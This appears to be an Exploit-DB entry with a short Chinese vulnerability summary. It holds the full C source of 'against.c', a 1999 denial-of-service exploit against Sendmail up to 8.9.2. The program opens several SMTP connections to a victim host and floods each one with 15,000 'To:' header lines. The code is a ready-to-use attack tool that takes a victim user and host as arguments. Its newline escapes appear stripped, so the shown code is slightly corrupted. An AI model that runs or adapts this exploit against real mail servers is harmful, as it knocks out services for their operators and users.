https://www.exploit-db.com/exploits/23167
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199901-003

Sendmail8.8.x和8.9.2版本中存在漏洞。远程攻击者通过发送带有大量标题的消息导致拒绝服务。

against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2)
  (c) 1999 by <[email protected]>

  Usage: ./against existing_user_on_victim_host victim_host
  Example: ./against nobody lamers.net

*/

#include <stdio.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <errno.h>
#include <signal.h>
#include <getopt.h>
#include <stdlib.h>
#include <string.h>

#define MAXCONN 4
#define LINES   15000

struct hostent *hp;
struct sockaddr_in s;
int suck,loop,x;

int main(int argc,char* argv[]) {

  printf("against.c - another Sendmail DoS (up to 8.9.2)n");

  if (argc-3) {
printf("Usage: %s victim_user victim_hostn",argv[0]);
exit(0);
  }

  hp=gethostbyname(argv[2]);

  if (!hp) {
perror("gethostbyname");
exit(1);
  }

  fprintf(stderr,"Doing mess: ");

  for (;loop<MAXCONN;loop++) if (!(x=fork())) {
FILE* d;
bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length);
s.sin_family=hp->h_addrtype;
s.sin_port=htons(25);
if ((suck=socket(AF_INET,SOCK_STREAM,0))<0) perror("socket");
if (connect(suck,(struct sockaddr *)&s,sizeof(s))) perror("connect");
if (!(d=fdopen(suck,"w"))) { perror("fdopen"); exit(0); }

usleep(100000);

fprintf(d,"helo tweetyn");
fprintf(d,"mail from: [email protected]");
fprintf(d,"rcpt to: %s@%sn",argv[1],argv[2]);
fprintf(d,"datan");

usleep(100000);

for(loop=0;loop<LINES;loop++) {
  if (!(loop%100)) fprintf(stderr,".");
  fprintf(d,"To: xn");
}

fprintf(d,"nnnsomedatannn");

fprintf(d,".n");

sleep(1);

fprintf(d,"quitn");
fflush(d);

sleep(100);
shutdown(suck,2);
close(suck);
exit(0);
  }

  waitpid(x,&loop,0);

  fprintf(stderr,"okn");

  return 0;
}

来源:BUGTRAQ
名称:19990121Sendmail8.8.x/8.9.xbugware
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=91694391227372&w;=2